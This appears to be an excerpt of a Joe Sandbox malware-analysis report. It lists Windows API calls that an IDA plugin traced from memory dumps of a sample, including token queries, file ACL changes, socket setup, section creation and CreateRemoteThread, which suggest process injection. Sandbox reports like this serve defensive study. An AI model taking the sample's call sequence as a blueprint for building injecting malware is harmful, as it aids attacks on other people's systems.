    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61
    • InterlockedDecrement.KERNEL32(?), ref: 00426F0F
    • InterlockedDecrement.KERNEL32(?), ref: 00426F26
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
    • InterlockedDecrement.KERNEL32(00000000), ref: 00426F6F
    • InterlockedDecrement.KERNEL32(00000000), ref: 00426F86
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 0040CF97: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CFBF
      • Part of subcall function 0040CF97: ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0040CFE2
      • Part of subcall function 0040CF97: ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0040D035
      • Part of subcall function 0040CF97: CloseHandle.KERNEL32(00000000), ref: 0040D043
      • Part of subcall function 0040CF97: Sleep.KERNEL32(000003E8,?,00000000), ref: 0040D064
    • Sleep.KERNEL32(000927C0), ref: 0040D3C0
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000008,00000029,00000000,76E6C426,00000000), ref: 0040D0F6
      • Part of subcall function 0040D076: HeapAlloc.KERNEL32(00000000), ref: 0040D0FD
      • Part of subcall function 0040D076: GetCapture.USER32 ref: 0040D10F
      • Part of subcall function 0040D076: WSAStartup.WS2_32(00000201,?), ref: 0040D147
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040D1F5
      • Part of subcall function 0040D076: HeapAlloc.KERNEL32(00000000), ref: 0040D1FC
      • Part of subcall function 0040D076: GetCurrentThreadId.KERNEL32 ref: 0040D20E
      • Part of subcall function 0040D076: wsprintfA.USER32 ref: 0040D241
      • Part of subcall function 0040D076: Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0040D2A1
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D2CF
      • Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D2D6
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D310
      • Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D317
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D326
      • Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D32D
      • Part of subcall function 0040D076: GetProcessHeap.KERNEL32(00000000,0040D3F2), ref: 0040D33E
      • Part of subcall function 0040D076: HeapFree.KERNEL32(00000000), ref: 0040D345
      • Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
      • Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
      • Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
      • Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
      • Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
      • Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
      • Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0
      • Part of subcall function 0040D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
      • Part of subcall function 0040D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
      • Part of subcall function 0040D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
      • Part of subcall function 0040D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
      • Part of subcall function 0040D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
      • Part of subcall function 0040D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
      • Part of subcall function 0040D8BA: FreeSid.ADVAPI32(00000000), ref: 0040D95A
      • Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D96F
      • Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D976
    • CreateThread.KERNEL32(00000000,00000000,0040D354,00000000,00000000,00000000), ref: 0040D47C
    • CloseHandle.KERNEL32(00000000), ref: 0040D483
      • Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
      • Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C
    • Sleep.KERNEL32(-0000EA60), ref: 0040D4B0
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,004255D8,?,?,?), ref: 0042550D
      • Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,00000001,00000000), ref: 00425577
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00425585
    • __freea.LIBCMT ref: 0042558F
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetLastError.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421385
      • Part of subcall function 0042123F: TlsGetValue.KERNEL32(00000000,00421398,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421248
      • Part of subcall function 0042123F: DecodePointer.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 0042125A
      • Part of subcall function 0042123F: TlsSetValue.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00421269
    • SetLastError.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213EF
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • DecodePointer.KERNEL32(00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213C1
    • GetCurrentThreadId.KERNEL32(?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 004213D7
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3
      • Part of subcall function 004212CD: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00435780,00000008,004213D5,00000000,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000), ref: 004212DE
      • Part of subcall function 004212CD: InterlockedIncrement.KERNEL32(?), ref: 0042131F
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetLastError.KERNEL32(00000000,?,00423589,00424BAC,?,0042085F,00000003), ref: 00421385
      • Part of subcall function 0042123F: TlsGetValue.KERNEL32(?,00421398,?,0042085F,00000003), ref: 00421248
      • Part of subcall function 0042123F: RtlDecodePointer.NTDLL ref: 0042125A
      • Part of subcall function 0042123F: TlsSetValue.KERNEL32(00000000,?,0042085F,00000003), ref: 00421269
    • SetLastError.KERNEL32(00000000,?,0042085F,00000003), ref: 004213EF
      • Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD
    • RtlDecodePointer.NTDLL(00000000), ref: 004213C1
    • GetCurrentThreadId.KERNEL32(?,0042085F,00000003), ref: 004213D7
      • Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
      • Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3
      • Part of subcall function 004212CD: GetModuleHandleW.KERNEL32(00434124,00435780,00000008,004213D5,00000000,00000000,?,0042085F,00000003), ref: 004212DE
      • Part of subcall function 004212CD: InterlockedIncrement.KERNEL32(004327E0), ref: 0042131F
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • TlsGetValue.KERNEL32 ref: 00421564
    • TlsGetValue.KERNEL32 ref: 00421576
    • DecodePointer.KERNEL32(00000000), ref: 0042158C
      • Part of subcall function 00421414: InterlockedDecrement.KERNEL32(?), ref: 004214B2
    • TlsSetValue.KERNEL32(00000007,00000000), ref: 004215A9
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetCurrentProcess.KERNEL32(00020008,0040E84F), ref: 0040E984
    • OpenProcessToken.ADVAPI32(00000000), ref: 0040E98B
    • GetTokenInformation.ADVAPI32(0040E84F,00000014,00000000,00000004,?), ref: 0040E9A4
    • CloseHandle.KERNEL32(0040E84F), ref: 0040E9AD
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6
    • __aulldvrm.INT64 ref: 0043041D
      • Part of subcall function 00426951: __isleadbyte_l.LIBCMT ref: 00426995
      • Part of subcall function 00426951: ___crtGetStringTypeA.LIBCMT ref: 004269D6
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6
    • __aulldvrm.INT64 ref: 0043041D
      • Part of subcall function 00426951: __isleadbyte_l.LIBCMT ref: 00426995
      • Part of subcall function 00426951: ___crtGetStringTypeA.LIBCMT ref: 004269D6
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
      • Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
      • Part of subcall function 0040F995: GetShellWindow.USER32 ref: 0040FA08
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
      • Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
      • Part of subcall function 0040F995: GetCapture.USER32 ref: 0040FA7E
      • Part of subcall function 0040F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
      • Part of subcall function 0040F995: GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
      • Part of subcall function 0040F995: NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
      • Part of subcall function 0040F995: CloseHandle.KERNEL32(00000000), ref: 0040FB4A
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
      • Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB62
      • Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69
      • Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB6C
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408C1A
      • Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408C1D
      • Part of subcall function 00408BB1: GetShellWindow.USER32 ref: 00408C38
      • Part of subcall function 00408BB1: GetModuleHandleA.KERNEL32(00000000), ref: 00408C5E
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408C74
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408C77
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408CB0
      • Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408CB3
      • Part of subcall function 00408BB1: GetMessagePos.USER32 ref: 00408CD1
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408D1C
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408D25
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408D2A
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408D2D
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408D70
      • Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408D73
      • Part of subcall function 00408BB1: GetCaretBlinkTime.USER32 ref: 00408D8A
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DDA
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DE3
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DEE
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DF1
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408DF6
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408DF9
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408E3E
      • Part of subcall function 00408BB1: HeapAlloc.KERNEL32(00000000), ref: 00408E41
      • Part of subcall function 00408BB1: GetCapture.USER32 ref: 00408E55
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EA0
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EA9
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EB0
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EB3
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EBA
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EC5
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408ECE
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408ED5
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408ED8
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EDF
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EE2
      • Part of subcall function 00408BB1: GetProcessHeap.KERNEL32(00000000,?), ref: 00408EE7
      • Part of subcall function 00408BB1: HeapFree.KERNEL32(00000000), ref: 00408EEA
      • Part of subcall function 00409408: GetVersion.KERNEL32(?,s@,?), ref: 00409414
      • Part of subcall function 00409408: CloseHandle.KERNEL32(00404E1D), ref: 00409433
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004094B2
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004094B5
      • Part of subcall function 00409408: GetShellWindow.USER32 ref: 004094D4
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,00000008,0000000C), ref: 00409535
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,00000008,0000000C), ref: 00409538
      • Part of subcall function 00409408: GetMessagePos.USER32 ref: 0040955D
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000008,0000002D,?,?,00000008,0000000C), ref: 004095E8
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,00000008,0000000C), ref: 004095EF
      • Part of subcall function 00409408: GetShellWindow.USER32 ref: 0040960B
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004096D0
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004096D3
      • Part of subcall function 00409408: GetClipboardViewer.USER32 ref: 004096F2
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00409768
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 0040976B
      • Part of subcall function 00409408: GetCursor.USER32 ref: 00409784
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004097D2
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004097D5
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?), ref: 004097DF
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004097E2
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004097FF
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409806
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000008,0000000C), ref: 0040981A
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 0040981D
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,00000008,0000000C), ref: 00409827
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 0040982A
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 004098CD
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 004098D4
      • Part of subcall function 00409408: GetShellWindow.USER32 ref: 004098F1
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 00409955
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 0040995C
      • Part of subcall function 00409408: GetKBCodePage.USER32(?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 00409975
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 004099C2
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004099CF
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000008,00000015), ref: 004099D5
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 004099DC
      • Part of subcall function 00409408: CreateRemoteThread.KERNEL32(00404E19,00000000,00000000,?,?,00000000,00404E25), ref: 00409A5D
      • Part of subcall function 00409408: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 00409A6F
      • Part of subcall function 00409408: GetExitCodeThread.KERNEL32(00404E1D,?), ref: 00409A88
      • Part of subcall function 00409408: GetLastError.KERNEL32 ref: 00409A93
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32 ref: 00409AC8
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000), ref: 00409ACF
      • Part of subcall function 00409408: GetShellWindow.USER32 ref: 00409AEC
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,00000015), ref: 00409B50
      • Part of subcall function 00409408: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409B57
      • Part of subcall function 00409408: GetKBCodePage.USER32(?,?,?,?,?,?,00000008,00000015), ref: 00409B70
      • Part of subcall function 00409408: GetModuleHandleA.KERNEL32(?,00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409BA0
      • Part of subcall function 00409408: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409BA7
      • Part of subcall function 00409408: WaitForSingleObject.KERNEL32(?,00007530), ref: 00409BDD
      • Part of subcall function 00409408: GetExitCodeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000008,0000000B), ref: 00409BF2
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000008,00000015), ref: 00409C09
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409C16
      • Part of subcall function 00409408: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,00000015), ref: 00409C1C
      • Part of subcall function 00409408: HeapFree.KERNEL32(00000000), ref: 00409C23
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408F71
      • Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 00408F74
      • Part of subcall function 00408F05: GetShellWindow.USER32 ref: 00408F8F
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408FE5
      • Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 00408FE8
      • Part of subcall function 00408F05: GetMessagePos.USER32 ref: 00409006
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409052
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040905B
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409060
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409063
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,00000018), ref: 004090A9
      • Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 004090AC
      • Part of subcall function 00408F05: GetCaretBlinkTime.USER32 ref: 004090C3
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409114
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040911D
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409128
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040912B
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409130
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409133
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00409178
      • Part of subcall function 00408F05: HeapAlloc.KERNEL32(00000000), ref: 0040917B
      • Part of subcall function 00408F05: GetCapture.USER32 ref: 0040918F
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004091DB
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 004091E4
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 004091EB
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 004091EE
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 004091F5
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409200
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409209
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409210
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409213
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 0040921A
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 0040921D
      • Part of subcall function 00408F05: GetProcessHeap.KERNEL32(00000000,?), ref: 00409222
      • Part of subcall function 00408F05: HeapFree.KERNEL32(00000000), ref: 00409225
    • CloseHandle.KERNEL32(00000000), ref: 004093F9
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
      • Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F88F
      • Part of subcall function 0040F859: GetShellWindow.USER32 ref: 0040F8A1
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
      • Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F90C
      • Part of subcall function 0040F859: CloseClipboard.USER32 ref: 0040F920
      • Part of subcall function 0040F859: LoadLibraryA.KERNEL32(?), ref: 0040F951
      • Part of subcall function 0040F859: GetProcAddress.KERNEL32(00000000), ref: 0040F958
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
      • Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F97E
      • Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
      • Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F98A
      • Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
      • Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
